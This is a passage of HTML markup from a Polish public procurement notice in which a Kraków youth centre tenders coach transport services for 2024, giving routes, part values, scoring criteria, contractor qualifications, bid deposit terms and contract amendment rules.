class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4. Zamówienie transportu osób na trasie Kraków - Gołkowice Górne<br/>a) Przedmiotem zamówienia jest świadczenie usługi transportu dla ok. 100 pasażerów wraz z bagażami na trasie Kraków – Gołkowice Górne 163 koło Starego Sącza.<br/>b) Każdy rozpoczyna się w piątek o godzinie 15:00 z Krakowa do Gołkowic Górnych 163, a kończy w niedzielę powrotem z Gołkowic Górnych 163 do Krakowa ok. godziny 16:00.<br/>c) Dodatkowo w sobotę przewidziana jest wycieczka całodniowa na trasie Gołkowice Górne 163- Jaworki/Szczawnica/Krynica (jedna z wymienionych) – Gołkowice Górne 163. Opłata za parkingi jest po stronie przewoźnika.<br/>d) Terminy wyjazdów: luty - grudzień 2024, przed każdym wyjazdem terminy będą uzgodnione w ramach kontaktów roboczych przez Zamawiającego 7 dni wcześniej<br/>e) Liczba wyjazdów: minimum 10, maksimum 40. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 199259 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ocena ofert w kryterium „Cena wykonania zamówienia” zostanie dokonana według wzoru:<br/>Cena=(Najniższa cena wykonania zamówienia @spośród ofert niepodlegających odrzuceniu)/(Cena wykonania zamówienia oferty ocenianej) x 60 pkt<br/><br/>Ocena ofert w kryterium „Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii ” zostanie dokonana zgodnie z zasadą: <br/> Jeśli wykonawca zaoferuje dostarczenie zamiennego środku transportu do :<br/><br/>	3 godzin od zgłoszenia awarii – oferta otrzyma 00,00 pkt,<br/>	do 2 godzin od zgłoszenia awarii – oferta otrzyma 40,00 pkt,<br/>	<br/>Niepodanie przez Wykonawcę w formularzu oferty Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii, spowoduje, iż Zamawiający przyjmie, że Wykonawca Deklaruje 3 godziny na podstawienie autobusu od zgłoszenia awarii i jego oferta w tym kryterium otrzyma 0 pkt. <br/><br/>Obliczenia punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jako najkorzystniejsza zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej wymienionych kryteriach oceny ofert.<br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje Deklarowany w godzinach termin na podstawienie dodatkowego autobusu dla każdej z części zamówienia. <br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje maksymalną cenę brutto dla każdej z części zamówienia oraz koszt pojedynczej usługi dla części I,II,III,IV,V. <br/>W przypadku części nr VI Wykonawca podaje cenę ryczałtową za wykonanie całości zamówienia określonego w pkt 6 Opisu Przedmiotu Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część V zamówienia: <br/>Świadczenie usług transportu w ramach jednodniowych wyjazdów wycieczkowych na trasie do 150 km od Krakowa i z powrotem dla 50 osób (od 10 do 50 wyjazdów).<br/>a)	Przedmiotem zamówienia jest świadczenie usługi transportu dla 50 pasażerów wraz z bagażami na trasie Kraków – do 150 km i z powrotem. (łącznie do 300 km)<br/>b)	Maksymalna liczba przejazdów 50 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 79629 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ocena ofert w kryterium „Cena wykonania zamówienia” zostanie dokonana według wzoru:<br/>Cena=(Najniższa cena wykonania zamówienia @spośród ofert niepodlegających odrzuceniu)/(Cena wykonania zamówienia oferty ocenianej) x 60 pkt<br/><br/>Ocena ofert w kryterium „Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii ” zostanie dokonana zgodnie z zasadą: <br/> Jeśli wykonawca zaoferuje dostarczenie zamiennego środku transportu do :<br/><br/>	3 godzin od zgłoszenia awarii – oferta otrzyma 00,00 pkt,<br/>	do 2 godzin od zgłoszenia awarii – oferta otrzyma 40,00 pkt,<br/>	<br/>Niepodanie przez Wykonawcę w formularzu oferty Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii, spowoduje, iż Zamawiający przyjmie, że Wykonawca Deklaruje 3 godziny na podstawienie autobusu od zgłoszenia awarii i jego oferta w tym kryterium otrzyma 0 pkt. <br/><br/>Obliczenia punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jako najkorzystniejsza zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej wymienionych kryteriach oceny ofert.<br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje Deklarowany w godzinach termin na podstawienie dodatkowego autobusu dla każdej z części zamówienia. <br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje maksymalną cenę brutto dla każdej z części zamówienia oraz koszt pojedynczej usługi dla części I,II,III,IV,V. <br/>W przypadku części nr VI Wykonawca podaje cenę ryczałtową za wykonanie całości zamówienia określonego w pkt 6 Opisu Przedmiotu Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część VI zamówienia: <br/>6. Świadczenie usług transportu z Krakowa do Czarnego Dunajca oraz z Czarnego Dunajca do Krakowa<br/>a)	Przedmiotem zamówienia jest świadczenie usługi transportu dla 150 pasażerów wraz z bagażami na trasie Kraków - Czarny Dunajec (w terminie 11.02.2023) , Czarny Dunajec – Kraków ( w terminie 17.02.2024 <br/>c) Wyjazd obejmuje przewóz 150 osób ( trzy autokary – 50 osobowe)<br/>e) Wykonawca winien zapewnić luki bagażowe umożliwiające zapakowanie bagaży prywatnych, sprzętu muzycznego oraz pomocy dydaktycznych. <br/>d) O dokładnych godzinach wyjazdów Zamawiający poinformuję Wykonawcę 48 h przed realizacją zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6889 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ocena ofert w kryterium „Cena wykonania zamówienia” zostanie dokonana według wzoru:<br/>Cena=(Najniższa cena wykonania zamówienia @spośród ofert niepodlegających odrzuceniu)/(Cena wykonania zamówienia oferty ocenianej) x 60 pkt<br/><br/>Ocena ofert w kryterium „Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii ” zostanie dokonana zgodnie z zasadą: <br/> Jeśli wykonawca zaoferuje dostarczenie zamiennego środku transportu do :<br/><br/>	3 godzin od zgłoszenia awarii – oferta otrzyma 00,00 pkt,<br/>	do 2 godzin od zgłoszenia awarii – oferta otrzyma 40,00 pkt,<br/>	<br/>Niepodanie przez Wykonawcę w formularzu oferty Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii, spowoduje, iż Zamawiający przyjmie, że Wykonawca Deklaruje 3 godziny na podstawienie autobusu od zgłoszenia awarii i jego oferta w tym kryterium otrzyma 0 pkt. <br/><br/>Obliczenia punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jako najkorzystniejsza zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej wymienionych kryteriach oceny ofert.<br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje Deklarowany w godzinach termin na podstawienie dodatkowego autobusu dla każdej z części zamówienia. <br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje maksymalną cenę brutto dla każdej z części zamówienia oraz koszt pojedynczej usługi dla części I,II,III,IV,V. <br/>W przypadku części nr VI Wykonawca podaje cenę ryczałtową za wykonanie całości zamówienia określonego w pkt 6 Opisu Przedmiotu Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy PZP,<br/>2)	spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, dla: (część I i/lub, część II i/lub, część III i/lub, IV część i/lub części V, i/lub części VI : <br/><br/>warunek udziału w postępowaniu, o którym mowa w art. 112 ust. 2 pkt 2) ustawy zostanie uznany za spełniony, gdy Wykonawca wykaże, że jest na dzień składania ofert jest podmiotem uprawnionym do prowadzenia określonej działalności zawodowej, tj.: posiada aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. 2001 nr 125 poz. 1371);<br/>Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia w którym upływa termin składania ofert w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca dołącza do oferty składanej w odpowiedzi na ogłoszenie o zamówieniu, oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez Zamawiającego. Wzór oświadczenia stanowi załącznik nr 3 do swz.<br/>2. Oświadczenie, o którym mowa w ust. 1, stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1, składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy, o którym mowa w pkt. 6 ust. 4 swz.<br/>5. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby.<br/>6. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118<br/>ustawy składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów. Zamawiający zaleca złożenie zobowiązania wg wzoru stanowiącego<br/>załącznik nr 2B do swz.<br/>7. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, Zamawiający<br/>wymaga od wykonawcy złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>8. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 7, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>9. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa<br/>w ust. 7, Zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy.<br/>10. Zapis ust. 9 stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego.<br/>11. Zapis ust. 7 – 9 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach<br/>określonych w art. 118 ustawy.<br/>12. Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu<br/>pełnomocnictwa (notarialnie – art. 96 ustawy z 14 lutego 1991 r. – Prawo o notariacie /tekst jednolity Dz. U. z 2020 poz. 1192 z<br/>późniejszymi zmianami/), z zastrzeżeniem innych zasad opisanych w niniejszej swz lub wynikających z przepisów prawa<br/>powszechnie obowiązującego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>1. Na potwierdzenie spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający<br/>żąda następujących podmiotowych środków dowodowych:<br/>a) odpowiedniego zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie<br/>jest niezbędne do świadczenia określonych usług w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania tj.<br/>zezwolenie na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym<br/>(t.j. Dz. U. z 2001 r. nr 125 poz. 1371);Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia,<br/>w którym upływa termin składania ofert w postępowaniu.<br/>b) Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia w którym upływa termin składania<br/>ofert w postępowaniu.<br/>c) Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, wykaz usług,<br/>o którym mowa powyżej, dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>2. Zamawiający nie wezwie do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w pkt. 7.1) ust. 1<br/>swz, dane umożliwiające dostęp do tych środków.<br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium przetargowe, na czas równy okresowi związania ofertą, w wysokości: 200,00 zł (słownie: dwieście złotych 00/100). <br/>2.	Wadium może być wniesione w jednej lub kilku formach wymienionych w art. 97 ust. 7 ustawy.<br/>3.	Wadium w formie pieniężnej winno być wniesione przelewem na rachunek bankowy:<br/>66 1020 4900 0000 8102 3402 0841 z dopiskiem: Świadczenie usług transportu dla Centrum Młodzieży im. dr. H. Jordana w Krakowie . W przypadku ofert składanych na jedną lub kilka części wykonawca zobowiązany jest do wniesienia wadium w wysokości kwoty 200 zł. <br/>4.	Wadium w pozostałych formach winno być wniesione do Zamawiającego w sposób jak złożenie oferty (opisany w pkt. 8.2 swz) lub na adres poczty elektronicznej przed upływem terminu składania ofert. Zamawiający wymaga wniesienia oryginału dokumentu elektronicznego. Jako oryginał dokumentu elektronicznego Zamawiający rozumie dokument w formie elektronicznej wystawiony przez gwaranta/poręczyciela lub dokument podpisany przez gwaranta/poręczyciela kwalifikowanym podpisem elektronicznym. Warunku powyższego nie spełnia kopia elektroniczna dokumentu podpisana przez Wykonawcę kwalifikowanym podpisem elektronicznym.<br/>5.	Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować Zamawiającemu wypłatę wadium, w przypadku zaistnienia okoliczności wskazanych w art. 98 ust. 6 pkt 1) i 2) a) i 3) ustawy.<br/>6.	Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających Zamawiającemu wypłacenie wadium. <br/>7.	Zamawiający nie dopuszcza postanowień określających, że zwrot, przez podmiot inny niż Zamawiający, dokumentu ustanawiającego wadium wnoszonego w formach innych niż w pieniądzu, powoduje wygaśnięcie tego wadium, w sytuacji gdy Zamawiający nie dokonał zwrotu tego wadium zgodnie z wymaganiami określonymi w ustawie.<br/>8.	Zamawiający zwraca lub zatrzymuje wadium na zasadach i w trybie art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo) chyba, że w przypadku spółki cywilnej, z umowy tej<br/>spółki wynika sposób jej reprezentowania (do stwierdzenia, czego niezbędne jest załączenie do oferty umowy spółki<br/>cywilnej). Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym, jako<br/>pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty<br/>występujące wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność<br/>za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.<br/>2. Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy, w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w szczególności zmiany stawki VAT w trakcie trwania umowy – w zakresie mającym wpływ na realizację umowy – dostosowanie postanowień umowy do zmiany przepisów prawa.<br/>3.Zgodnie z art. 439 ustawy Prawo zamówień publicznych, Strony umowy zgodnie postanawiają, że dopuszczają zmianę wynagrodzenia w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. <br/>4.Zmiana wynagrodzenia, o której mowa w ust. 3, będzie możliwa w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia o więcej niż 30% w stosunku do ceny materiałów lub kosztów obowiązujących w dniu otwarcia ofert. <br/>5.Wprowadzenie zmiany wysokości wynagrodzenia, o której mowa w ust. 4 wymaga uprzedniego złożenia przez Wykonawcę oświadczenia o wysokości wzrostu ceny materiałów lub kosztów związanych z realizacją zamówienia. Wykonawca lub Zamawiający zobowiązany jest do przedłożenia szczegółowej kalkulacji kosztów wraz ze wskazaniem ich wpływu na koszty realizacji zamówienia.<br/>6.W terminie 10 dni roboczych od dnia przekazania oświadczenia, o którym mowa ust. 5, Strona, która otrzymała oświadczenie, przekaże drugiej Stronie informację o zakresie, w jakim zatwierdza oświadczenie, oraz wskaże kwotę, o którą wynagrodzenie umowne powinno ulec zmianie, albo informację o niezatwierdzeniu wniosku wraz z uzasadnieniem.<br/>7.Poziom wzrostu kosztów związanych z realizacją zamówienia oraz zmiana wysokości wynagrodzenia zostaną ustalone na podstawie wskaźnika ogłaszanego w komunikacie Prezesa Głównego Urzędu Statystycznego lub przez wskazanie innej podstawy, w szczególności wykazu rodzajów materiałów lub kosztów, w przypadku których zmiana ceny uprawnia strony umowy do żądania zmiany wynagrodzenia, odpowiednio na dzień otwarcia ofert oraz na dzień wprowadzenia zmiany do umowy. <br/>8.Zmiana wynagrodzenia, o której mowa w ust. 3-7 możliwa będzie nie częściej niż 1 raz w trakcie trwania umowy i nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy. Maksymalna wartość wszystkich zmian wynagrodzenia nie może przekroczyć 10% wynagrodzenia brutto, o którym mowa w § 4 ust. 1 umowy.<br/>9.Zmiana wynagrodzenia dokonana w trybie ust. 3-8 będzie odnosić się wyłącznie do części przedmiotu Umowy wykonywanej po dniu wejścia w życie aneksu zmieniającego wysokość wynagrodzenia.<br/>10.Przez zmianę wysokości cen materiałów lub kosztów związanych z realizacją zamówienia rozumie się zarówno wzrost, jak i obniżenie odpowiednio cen lub kosztów względem cen lub kosztów przyjętych w celu ustalenia wynagrodzenia Wykonawcy określonego w ofercie. <br/>11.W przypadku dokonania zmiany wynagrodzenia dokonanej w trybie ust. 3-8, Wykonawca zobowiązany jest do zmiany wysokości wynagrodzenia przysługującego jego podwykonawcom, z którymi zawarł umowy, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione zostaną następujące przesłanki: <br/>1) Przedmiotem umowy o podwykonawstwo są usługi, <br/>2) Okres obowiązywania umowy przekracza 6 miesięcy. <br/>12.W przypadku braku zapłaty lub nieterminowej zapłaty wynagrodzenia należnego podwykonawcom z tytułu zmiany wysokości wynagrodzenia, o której mowa w ust. 11 Zamawiający naliczy Wykonawcy karę umowną w wysokości 25% kwoty przysługującej z tytułu zmiany wynagrodzenia, o której mowa w ust. 11. Kwota kary umownej zostanie zapłacona w terminie 14 dni od otrzymania wezwania Zamawiającego do uiszczenia kary umownej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-26 16:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span 